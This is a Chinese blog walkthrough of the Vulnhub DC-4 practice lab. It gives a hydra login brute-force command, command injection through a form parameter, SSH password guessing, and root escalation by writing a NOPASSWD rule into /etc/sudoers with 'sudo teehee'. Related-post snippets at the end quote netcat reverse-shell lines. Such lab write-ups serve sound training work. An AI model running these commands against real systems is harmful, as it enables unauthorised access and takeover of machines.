【Vulnhub靶机】DC-4(sudo teehee提权)

已于 2023-11-25 12:57:00 修改
阅读量270 收藏 1
点赞数 1
分类专栏: # 靶机系列 文章标签: 网络安全 靶机
于 2023-08-04 18:32:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhaoSong_/article/details/132110397
版权

文章目录

DC-4官网

信息收集

先查看靶机的MAC地址

在这里插入图片描述

arp-scan -l

在这里插入图片描述

找到目标靶机的IP地址,对其进行扫描

在这里插入图片描述

发现开放了80端口和ssh,浏览器访问靶机的80端口,看看有没有可以利用的东西

在这里插入图片描述

目录爆破发现也没有什么东西

dirsearch -u http://192.168.80.146

在这里插入图片描述

漏洞利用

利用bp进行密码爆破

在这里插入图片描述

1、发送到intruder,给密码打上标记

在这里插入图片描述

2、倒入密码字典,然后Start attack

在这里插入图片描述

在这里插入图片描述

也可以用hydra破解密码

hydra -l admin -P top1000.txt 192.168.80.146 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

这是一个 Hydra 的命令行指令,用于暴力破解 Web 应用程序的登录。解释如下:

hydra:命令名,表示使用 Hydra 工具。

-l admin:指定用户名为 admin。

-P top1000.txt:指定密码字典为当前目录下的 top1000.txt。

192.168.80.146:指定要攻击的服务器 IP 地址。

http-post-form:指定使用 HTTP POST 请求方式。

"/login.php:username=^USER^&password=^PASS^:S=logout":指定登录页面地址 /login.php,并使用 username 和 password 作为参数名来传递用户名和密码。其中 ^USER^ 和 ^PASS^ 含义为在暴力破解过程之中将要用到的用户名和密码,而 :S=logout 则是指当程序返回值为 logout 时,认为破解成功并退出程序。

-F:如果成功的话,停止猜测其他密码。

综上所述,上述命令的作用就是对目标服务器 192.168.149.134 的 /login.php 页面进行暴力破解登录,用户名为 admin,密码字典为 top1000.txt

在这里插入图片描述

3、账号admin,密码happy登录成功

在这里插入图片描述

4、点击Comand,看看有什么东西

在这里插入图片描述

5、发现点了Run之后,就会运行linux命令

在这里插入图片描述

6、可以试着再次用bp抓包

在这里插入图片描述

7、右键发送到Repeater

在这里插入图片描述

8、然后试着修改一下radio后面的值,发现可以执行命令

在这里插入图片描述

9、输入cat /etc/passwd查看有没有用户

在这里插入图片描述

10、继续查看每个用户的家目录,发现只有jim用户家目录有数据

在这里插入图片描述

在这里插入图片描述

11、访问jim目录下backups,发现有一个旧的密码本

在这里插入图片描述

在这里插入图片描述

12、可是试着复制一下这个密码本里的东西,保存到一个文件里,尝试密码爆破,因为这个密码本是在jim的家目录找到的,还开了ssh远程服务,可以用hydra九头蛇破解一下

在这里插入图片描述

13、用爆破出来的密码进行ssh连接 ,显示有已邮件

在这里插入图片描述

14、前面对backups文件进行了查看,现在查看mbox

在这里插入图片描述

15、cd /var/mail, 查看这封邮件信息

在这里插入图片描述

16、通过邮件内容,可以知道Charles 的密码,

可以切换到charles用户

在这里插入图片描述

在这里插入图片描述

提权提权

#查看可以运行的命令:   
sudo -l

在这里插入图片描述

发现可以使用teehee,

可以使用命令:
echo 'charles ALL=(ALL:ALL) NOPASSWD:ALL' | sudo teehee -a /etc/sudoers

这句话的意思是将charles用户赋予执行sudo的权限添加到/etc/sudoers里。
| 是管道符 将前面的输出作为后面的输入
sudo teehee -a 是用管理员权限使用teehee -a命令
teehee -a 是添加一条语句到 /etc/sudoers里
/etc/sudoers 里存着的用户都有执行sudo的权限。

在这里插入图片描述

在这里插入图片描述

过期的秋刀鱼-
关注
专栏目录
VulnHubDC-4
weixin_39219503的博客
01-31 287
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-4,313/ 题目信息如下,只有一个flag Description DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration te...
vulnhub靶机DC-4 渗透笔记
liver100day的博客
06-09 2150
DC-4 靶机渗透 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机DC-3 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/ 渗透过程 1.信息收集 1.1 主机发现 arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) 确认目标靶机IP地址:192.168.75.148 1.2 端口扫描 确认了IP地址,接下来我们就使用端口扫描神器来扫描目标靶机开放的端口 nmap -T4 -
Vulnhub DC-4
柠檬木有枝
07-14 250
Nmap 扫描主机,nmap -sS 192.168.6.0/24 访问服务是一个登陆页面,使用 burp 爆破用户名为 admin,密码为 happy /home/jim/backups 下发现 old-passwords.bak 读取一下 使用 hydra 爆破 ssh:hydra -l jim -P password.txt 192.168.6.130 ssh 用户名:jim,密码:...
Vulnhub-DC-4
KAKA的博客
07-04 299
扫描获取目标 IP 地址:192.168.67.135 nmap -sn 192.168.67.0/24 扫描目标,获取系统信息和开放端口:80 && 22 nmap -A -p- 192.168.67.135 (初步猜想就是通过 web 获取到系统用户密码,再通过 ssh 登陆最后提权的思路) 登陆 http://192.168.67.135 : 首先看下 wapplayzer,发现是 Nginx ,但暂时得不到详细版本,故先记录,以防备用 页面上写着:Admin Information
vulnhub-dc4
bqnagus
10-05 1185
vulnhub-dc4靶机复现
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1972
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1942
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
vulnhub靶机-DC4-Writeup
liuhanzhe的专栏
12-08 233
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-4,313/ DESCRIPTION DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. Unlike the previous DC releases, this one is designed primarily fo
Dc-4靶机渗透----burpsuite抓包与爆破、hydra、sudoteehee提权、/etc/passwd的使用
z2560088的博客
09-27 600
nmap扫描,扫描出80端口和ssh端口 先访问http服务。再用whatweb和dirb扫描该网站,发现既没有cms有没有相关的文件可以查看 那我们只能抓包爆破,或者海德拉爆破,账号其实有提示了大概就是admin,只需破解password即可 爆破得到admin:happy 登录 继续执行命令抓包 修改radio的值 使用nc nc 192.168.160.129 777 -e /bin/bash 改成nc+192.168.160.129+777+-e+/b...
VulnHub DC: 4
spider的博客
12-01 246
下载地址 https://download.vulnhub.com/dc/DC-4.zip 从nmap 入手(靶机在192.168.1.106) nmap -sT -sV -sC 192.168.1.106 -O -p- 开放了80,22端口。 先上个80看看 只有一个登陆界面,尝试在username输入’or’1’='1 看看有没有sql注入。重定向回本页面。 ...
Vulnhub靶机 DC-4
菜浪马废的博客
03-23 449
信息收集 `arp-scan -l 扫描本地 nmap -sV 192.168.0.132 扫描靶机开放端口` 开放80端口,访问一下页面 是个登录页面,而且可以用爆破来登录,没有验证机制 安装pydictor,一个字典生成工具,用它生成一个用户名字典 git clone --depth=1 --branch=master https://www.github.com/landgrey/p...
[Vulnhub] DC-4
weixin_63231007的博客
01-28 906
DC系列靶机-第四弹(hydra爆破密码+teehee命令提权)
[VulnHub]DC-4
cosmoslin的博客
09-07 145
VulnHub——DC-4渗透测试过程记录 测试人员:cosmos 目标地址:192.168.131.130 目标账号:未知 目标主机:未知 信息搜集 1.netdiscover netdiscover -r 192.168.131.0/24 2.masscan masscan --rate=10000 --ports 0-65535 192.168.131.130 3.nmap nmap -A 192.168.131.130 网站测试 进入网站 发现需要登录,提示admin登录,猜测用户名
vulnhub靶机DC-4
m0_52328368的博客
08-19 1173
vulnhubdc-4详细步骤
Vulnhub渗透测试靶机DC-4
weixin_46128614的博客
01-19 479
下载地址:https://www.vulnhub.com/entry/dc-4,313/ nmap没有扫描到什么有用端口 直接访问80端口 只有一个认证框 没有验证 bp爆破admin弱密码 发现密码admin qwert 进入后台 发现有执行命令的地方 抓包发现命令由post包传过去 执行的命令由客户端传到了服务端 命令执行获取shell 把nc -e /bin/sh 192.168.49...
vulnhub靶场,DC-4
kukudeshuo的博客
07-12 318
vulnhub靶场,DC-4 环境准备 攻击机:kali(192.168.58.130) 靶机DC-4(192.168.58.147) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.147 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80 浏览器访问目标靶机的80端口 就是一个登入页面,不知道账号密码,所以没有多大用处 网站目录扫描
Vulnhub靶机渗透测试——DC-4
Cobra的博客
05-03 1789
一、实验环境 攻击机(kail):192.168.189.148 靶机(ubuntu):192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183,再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口,访问其80端口,是一个登录框 4、在对其进行SQL注入,目录扫描无果后,果断选择暴力破解..
Vulnhub靶场渗透-DC-4
paidx0
10-21 269
前言 靶机IP(192.168.110.134) 攻击机IP(192.168.110.127) 网络NAT模式 信息收集 访问80端口,提示以admin的用户名登录 直接爆破了,爆破结果是 admin:happy 漏洞利用 登录进去发现是个可以RCE的 思路是不是来了,很显然直接弹shell了 怎么弹shell就不多说了,我的靶场笔记很多都有写 存在三个用户 进入jim的backups文件夹发现了很多的旧密码,思路这不就又来了 开放ssh服务,很显然是要我们去爆破了 拿到jim的账号了,登
vulnhub靶机-jangow: 1.0.1
最新发布
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值